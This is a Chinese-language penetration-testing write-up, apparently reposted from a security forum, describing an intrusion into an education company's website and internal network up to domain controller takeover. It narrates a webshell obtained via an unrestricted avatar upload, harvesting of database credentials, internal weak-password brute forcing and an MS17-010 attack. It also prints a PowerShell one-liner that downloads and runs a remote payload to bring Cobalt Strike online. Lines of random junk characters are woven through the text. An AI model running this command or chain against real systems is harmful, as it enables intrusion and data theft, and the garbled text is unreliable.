* _2 X' |8 a! i* j 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路8 h; {+ q4 P1 _, E7 T+ P: _$ s
7 P& l; E3 Y$ L, p1 N' G8 m1 ~" j6 J! B
9 w% w1 z8 ?' O# e
1 E- k& W9 Z" c8 f2 ?1 S8 q
Q7 l. v, I; ]
正文
# y- A/ n/ Q$ ]! w % _" U2 T) x: v: I. S+ B
6 W9 u; u; B; r% J3 }, f, G
% i; j5 w& Q5 r1 s, y* e6 w
. j* {; f2 T/ \7 A
( N7 }* B1 ~. `9 R n0 d; n& |2 H 目标:www.xxxx.com(一家教育机构) + k) k/ j, A# g. M" F+ r
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能5 K0 q3 s; B# u+ w- t" u ]" M
" F) t4 Y( F% F8 |- q# o. ?& x2 Q8 n
( H" y$ c6 j9 |' c8 X
' I& f! E1 `( F4 o2 P9 T# ~5 F
/ H" b4 M( K8 v/ n. {3 [6 S
" E0 [3 t. |! I. J9 Q 进行了简单的信息搜集 1 U+ j5 E& z/ a3 r" s) K" q e
' k% ^. z7 ?+ k: j; j
/ c: X' R: Y9 j9 S3 D+ s$ i* Z 8 Z& ^$ L K7 C' s
: m' F! J( @- k 子域名搜集
8 ^+ d* K9 ^; A( o* R" V
9 g( x7 s7 l9 l0 T% Y. O1 K6 v* r
7 M2 f3 Y" O% D: V( R4 e5 { 6 Q" Y3 O5 U) A/ N$ n9 g+ m
* a4 Y+ l! o& G ]8 X( W
- O: T! X; d& p, A* i4 p q! g1 W fofa找资产 % F: {' M. {* J( _( |
2 i# G/ Y( F: l9 M2 O( p1 Q$ J9 o6 d6 a8 f. E, T
/ N0 o% Z( s A/ E# X
3 l- b' W( N. L( P9 [% y6 b5 d . D) I( M6 i$ s1 [3 z) d3 D
6 J9 R/ @5 q% q- u1 o: O+ q6 w( G' V6 | O( W% T
一共七个资产。去重之后只有两个。 2 V3 i: t: q6 g5 ~ I
8 j- D5 g- f) D& H6 c9 e* z
: a7 u1 c5 X5 K/ i7 N: J1 H2 [
: a# X) b+ b7 {* r) w& j9 O- k3 D% T A8 }9 q5 f" h% B0 c
目录探测
" V9 F4 F: q* l
- c$ L; t& u$ B( x) r# ^- Y- @! A- ` J) ~5 l* i6 G$ W0 j3 ]* q
4 H/ K/ }& j9 X' H) A# u. ^
- t# ?7 H" ~6 Y$ o" ~9 G; j
/ H& O: u4 _/ z0 d0 O" ]$ B 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 9 {, Y$ `/ S* E3 G, w4 V4 [
g1 P) o3 c. D9 L* w k# A
+ E6 o5 g% v. l- |, R- G! d l' m% \& c
* g" K/ L% ^( L: a( x
1 X6 c. ~8 o7 c" `% z: H( y 我又尝试了通过修改返回包来绕过登录界面
8 I5 p1 |7 a* @1 M) V- V . M/ U% v; s% L# t
& f U1 h, o1 y6 {+ E1 u" i
& n h, Q: ?0 r
p" \) Q8 i+ d9 X8 k, F7 T
% B: I8 {$ T6 P4 ]0 N) J& o
还是不行,尝试注入无果
/ M, h) Q. `+ e. a: N$ F7 ? & s) h' ~# Y8 g+ [) ^! ^6 a
8 Y% ?* D8 @* b- ~ m " r: b" q; f1 l* v7 G
, Z3 W+ a _6 M( J" J/ C& P8 @
4 y' j% K$ {* \) Y; Y$ N 不过我目录探测出了一处Spring信息泄露 ; Z& s( ]. P, \- m1 J5 p* t/ f$ P( m
8 ?9 l) d5 c: V! H' ?0 |
7 J3 m9 g. a" A# F/ M/ X$ b5 Y
2 I& y8 O+ x- }4 J% S/ `" u+ k0 g+ R
) a4 F1 }" ^; f+ y& j% N5 k
- \( ?; a2 f* w$ d
w1 C$ Y2 q3 I" n7 {; l& Q 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录$ L' V7 C8 D8 ~, Q2 `9 V
0 D e2 u0 S7 x; t" i
4 B- j) ?# _' j! r ( x# N7 l$ }3 Q/ j* {
6 _9 v: g3 c6 O" p' O& R
) `: F3 k ~8 D9 c
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
; A9 T& K& d# B# K
$ Q1 I! L% h. w( P
6 A+ C6 Z5 `( }- c
7 R( x# p( d3 R0 x. L" I
( t: V/ `6 v0 W# V; D% P: ]5 S6 P( q" S0 p1 b7 c. ^* X, X
获取有些师傅到这一步就手机抓包电脑测了。, h- J0 |7 A' G( P; \ l
* [9 r+ Q$ s2 j
4 M9 u. W/ L3 d2 v+ h- E Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。+ y1 W- d3 i2 k" b7 h
/ ]7 z, Q0 u0 V% w+ Q8 k) [8 X7 A; W6 {8 I% H
其中在一个公众号发现了小程序,可以进行注册。
# m9 t: \: ~6 h- u3 D $ D: Q! L2 n: \% c! c0 ?
; i& {& C8 ? T( H 看到了头像上传,尝试上传获取WebShell
; ] r3 b5 w6 W- [3 h- O/ `+ P
. t4 k& L- X$ \ f4 Q# Q1 C, q0 l( m+ U% A
9 D# U4 i3 T( N( r 0 ~# I3 B" q$ m0 ?$ i( p
4 x3 K0 ~, C* F, J, n9 Q
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
% R3 k9 \/ P' \! i$ |9 w
5 @* Y* X" p. B; f$ V3 F: t' q& C% t2 s( k" G) }3 P. @
! K, u+ i6 a' `
* `$ l. z( F) u; d& Q M5 O9 N0 e' X" }2 d( N4 |3 N
然后上了大马
( H$ Z3 H0 _1 N5 h, x: M5 A3 n$ c: y
" g9 t: Y2 f. i# F8 s V9 n2 t- [2 _- F! b7 o {% d
1 D3 M8 B: v3 k5 q$ A M
6 e* E$ y& Q- ~: Q
( i* t# A, W, I3 v W 2 ~2 q; G% M- ~
7 x0 j0 s: Y* n: q+ p
# T1 g0 z7 h* t4 o$ Q6 a4 i, J 通过翻找文件发现数据库账号密码* I) ]; Y; @3 c* N1 E
- Q7 _- Y: [3 c+ L. }) z9 o
* L" F* ?( w- r1 ~4 V# E, e* A 9 P: [4 n9 E% `3 I0 Z
7 O. i8 l! k4 ]% w% X: g6 X K, `8 U
--内网渗透( j+ p$ f2 n4 O" X
! {: G% y6 g- p, T
& a; B+ J5 ?* R8 S* V
直接通过powershell执行 cs上线% p& {; B6 Z3 E" p- d% y8 j
8 d4 U, ~# {- y8 F# w: w
! \( p' h0 \3 i& B7 _5 L powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))": A; U5 [: r$ a0 @
% U6 c2 ]% i: n$ A6 D4 u6 M% }' }9 c* b, k3 `) Y
, R! z0 G1 A# Y& _ * c+ D7 Y& k* K# J
& k' [1 `1 h. h0 W: j0 f
进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
$ V. t. K( N4 f" L! q, I ; I' d- m& f% r' e! O
b* b' Y1 ?- } . A L7 a+ S6 U+ i1 _& c& r
3 H7 G+ q3 ~ k) m% v
9 f% _+ o2 F y 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 / [" c/ @' u$ {& V) @
- Z E( h* b' k2 A% d) C
, v/ R# W2 o+ F' b. F4 e2 i5 k
) Y" N7 N; J- O# _( {5 e7 j 7 q0 U$ D0 |, `( H$ I- L
& F4 D" {3 e2 g$ L \$ X/ D$ f7 c
8 M6 g g+ S! [8 w$ l1 m5 X
. \( r6 E/ K+ S A% E# E6 V: K
6 }; ^1 A$ s- `2 Q3 ~& c! F' h9 e 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
3 n( g, B# Z0 ?% g2 A7 y4 \' {
/ Y. D; J! D. ^' I) i! ?- ~/ \9 E& k; X
8 y5 E* a, P) H" Z7 A6 |) ~' n
* W3 j9 Z4 H- _' L( v& B( z
" J3 o. x3 }1 p+ C* K
' [) W- T% B! O/ {+ r; G5 ~7 P, a* i8 R$ Z4 w% A2 w, T
$ o' }' E$ w7 e C
& W; z5 a5 X( N9 h' W% [" N- k0 g# G- i- ~& [; d1 ~: X M$ p
& S: N/ ]: {9 \/ K+ m: [+ n1 {& W; H- F7 `
- q( l2 F0 S4 H( ^7 J
& h# ^, l( l# f$ @+ J
$ K' N, e' ^/ ~: c- m 小结- ~% Z# Y% x2 f1 p2 N
& F# z$ K% ^" l7 r) ~1 T' r
5 v3 i! _5 a. u. @( u
/ v! X3 @. J4 s) b' z1 @
) X! @8 P5 r; w, r2 c8 G7 V* U! c: q4 R* M
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
- U \0 {. R ? e - G( j0 P2 I5 K# U& m
2 p2 K, Y5 E4 |8 |
8 D; k! A) P' }5 ?$ e6 z) E
. {! k) k. F9 U* ]) D6 d, W" i8 j8 d4 U
- 9 }6 x0 b" d4 U2 ]
8 @8 g8 a1 u7 ]" _2 T% U3 R
$ F4 N3 S: w; U2 h -
8 U1 e, ]# q" K# A- T6 W
0 O% F: D+ t1 Q5 p5 `6 T- u
5 h; [0 B) u: o( N+ z+ l- r
, P7 u: u l& T- B) s! X1 f; }7 f
% I# N6 s/ l9 Y& r- |' }# ]: t 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html( X' U2 ]6 Z9 F! R
4 d) Y* ]3 f6 N+ Z
, |( g; m7 e8 j6 Q, C
& K O# Z! G2 B x1 b. L |